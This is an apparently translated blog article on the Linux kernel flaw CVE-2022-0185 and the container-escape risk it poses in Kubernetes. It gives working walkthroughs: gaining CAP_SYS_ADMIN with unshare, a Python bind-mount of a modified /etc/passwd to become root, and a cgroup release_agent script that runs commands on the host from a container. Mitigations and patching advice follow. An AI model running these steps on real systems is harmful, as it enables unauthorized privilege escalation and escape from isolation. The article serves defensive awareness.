Author: Michelangelo, KubeSphere evangelist, cloud native heavily infected person
On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow vulnerability with ID number in the legacy_parse_param function of the filesystem context function of the Linux kernel (5.1-rc1+) 2022-0185 , which is a high-risk vulnerability with a severity level of 7.8 .
The vulnerability allows out-of-bounds writes in kernel memory. Exploiting this vulnerability, an unprivileged attacker can bypass any Linux namespace restrictions and escalate their privileges to root. For example, if an attacker infiltrates your container, they can escape from the container and escalate privileges.
The vulnerability was introduced into Linux kernel 5.1-rc1 version in March 2019. A patch released on January 18 fixes the problem, and all Linux users are advised to download and install the latest version of the kernel.
Vulnerability Details
The vulnerability is caused by an integer underflow condition found in the legacy_parse_param function of the file system context function (fs/fs_context.c). The function of the filesystem context is to create the superblock for mounting and remounting the filesystem. The superblock records the characteristics of a filesystem, such as block and file size, and any storage blocks.
By sending more than 4095 bytes of input to the legacy_parse_param function, the input length detection can be bypassed, resulting in an out-of-bounds write, triggering the vulnerability. An attacker could exploit this vulnerability to write malicious code to other parts of memory, crash the system, or execute arbitrary code to escalate privileges.
legacy_parse_param The input data for the function is added via the fsconfig system call to configure the filesystem's creation context (such as the superblock for ext4 filesystems).
// 使用 fsconfig 系统调用添加由 val 指向的以空字符(NULL)结尾的字符串
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);
To use the fsconfig system call, an unprivileged user must have at least CAP_SYS_ADMIN privileges in their current namespace. This means that if a user could enter another namespace with these permissions, it would be sufficient to exploit the vulnerability.
If an unprivileged user cannot obtain the CAP_SYS_ADMIN permission, an attacker can obtain it through the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The Unshare system call allows the user to create or clone a namespace or user with the necessary permissions for further attacks. This technique is important for the and container worlds using Linux namespaces to isolate pods, and attackers can fully exploit this in a container escape attack. Once successful, an attacker can gain access to the host OS and the Full control permissions for all containers , so as to further attack other machines in the internal network segment, can even deploy malicious containers in the Kubernetes cluster.
The research team that discovered the vulnerability published the code and proof of concept exploiting the vulnerability on GitHub on January 25.
PoC
Docker and other container runtimes use the Seccomp profile by default to prevent processes in the container from using dangerous system calls to protect Linux namespace boundaries.
Seccomp (full name: secure computing mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005), limiting the system calls available to a process to four: read, write, _exit, and sigreturn. The original mode was a whitelist mode, in which, in addition to the open file descriptors and the four allowed system calls, the kernel would use SIGKILL or SIGSYS to terminate the process if other system calls were attempted.
However, Kubernetes by default does not use any Seccomp or AppArmor/SELinux configuration files to restrict the system calls of Pods, which is very dangerous. Processes in Pods can freely access dangerous system calls and wait for the necessary privileges (such as CAP_SYS_ADMIN). ) for further attacks.
Let's start with a Docker example. In a standard Docker environment, the unshare command is not available. Docker's Seccomp filter blocks the system call used by this command.
$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted
Let's take a look at the Pod of Kubernetes:
$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user 3 1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
It can be seen that the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain the CAP_SYS_ADMIN capability through the unshare command.
root@test:/# unshare -Urm
#
# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1 265 root sh full
# lsns | grep user
4026532695 user 3 265 root -sh
So what can you do with CAP_SYS_ADMIN? Here are two examples showing how CAP_SYS_ADMIN can be used to infiltrate a system.
Ordinary users are elevated to root users!
The following operation can directly escalate ordinary users in the host to root users.
First give python3 the capability of CAP_SYS_ADMIN (note that soft links cannot be operated, only original files can be operated).
$ which python3
/usr/bin/python3
$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13 2020 /usr/bin/python3 -> python3.8*
$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep
Create a regular user.
$ useradd test -d /home/test -m
Then switch to the normal user and enter the user's home directory.
$ su test
$ cd ~
Copy /etc/passwd to the current directory and change the root user's password to " password ".
$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/
# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Mount the modified passwd file to /etc/passwd .
# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
$ python3 mount-passwd.py
The last is the moment to witness the miracle! ! ! switch directly to the root user and enter the password "password".
$ su root
Password:
root@coredns:/home/test#
Amazing, switch to root user. . .
Let's see if we really have root privileges:
$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....
$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE
Hmm, root is right.
Finally, remember to uninstall /etc/passwd.
$ umount /etc/passwd
So, System Reboot Engineers, hurry up and see if the ordinary users you assign to others have the CAP_SYS_ADMIN capability~~
View all processes on the host in the container!
Let's look at an example of a container. The following operation allows you to get all the processes running on the host in the container.
We don't need to use the --privileged
parameter to run privileged containers, that would be boring.
$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
Next, execute the following command in the container. The final effect is to execute the ps aux command on the host and save its output to the /output file in the container.
# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
Eventually you can see all the processes running in the host in the container:
root@0c84f7587629:/# cat /output
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 172704 13148 ? Ss 2021 131:32 /sbin/init nopti
root 2 0.0 0.0 0 0 ? S 2021 0:18 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 2021 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 2021 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 2021 0:00 [kworker/0:0H-kblockd]
root 8 0.0 0.0 0 0 ? I< 2021 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 2021 18:36 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 2021 262:22 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 2021 3:06 [migration/0]
root 12 0.0 0.0 0 0 ? S 2021 0:00 [idle_inject/0]
root 14 0.0 0.0 0 0 ? S 2021 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S 2021 0:00 [cpuhp/1]
......
I will not explain the specific meanings of these commands. Those who are interested can study them by themselves.
It is certain that the CAP_SYS_ADMIN capability provides more possibilities for attackers, whether in the host or in the container, especially in the container environment. If we cannot upgrade the kernel due to force majeure, we must seek other solutions. .
solution
container level
Since v1.22, Kubernetes can use SecurityContext to add default Seccomp or AppArmor profiles to resource objects to secure Pods, Deployments, Statefulsets, Daemonsets, and more. While this feature is currently in Alpha, users can add their own Seccomp or AppArmor profile and define it in the SecurityContext. E.g:
# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
name: protected
spec:
containers:
- name: protected
image: ubuntu
command:
- sleep
- infinity
securityContext:
seccompProfile:
type: RuntimeDefault
After creating the Pod, try to use unshare to get the CAP_SYS_ADMIN capability.
$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted
The output shows that the unshare system call is successfully blocked, making it impossible for an attacker to exploit this capability.
host level
Another solution is to disable the user's ability to use the user namespace from the host level without restarting the system. For example, in Ubuntu, just execute the following two lines to take effect immediately, and it will take effect after restarting the system.
$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
If it is a Red Hat system, you can execute the following command to achieve the same effect.
$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
Summarize the suggestions for dealing with this vulnerability:
- If your environment can accept patching the kernel, and can accept rebooting the system, it is best to patch, or upgrade the kernel.
- Reduce the use of privileged containers with access to CAP_SYS_ADMIN.
- For unprivileged containers, make sure to have a Seccomp filter to block their calls to unshare to reduce risk. Docker is fine, Kubernetes needs extra action.
- Seccomp profiles can be enabled for all workloads in a Kubernetes cluster in the future. At present, this feature is still in the Alpha stage and needs to be turned on through the feature gate .
- Disables the ability for users to use the user namespace at the host level.
write at the end
The container environment is complex, especially for a distributed scheduling platform like Kubernetes. Each link has its own life cycle and attack surface, which easily exposes security risks. Container cluster administrators must pay attention to the security issues in every detail. In general, the security of containers in most cases depends on the security of the Linux kernel, so we need to keep an eye on any security issues and implement corresponding solutions as soon as possible.
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用
。你还可以使用@
来通知其他用户。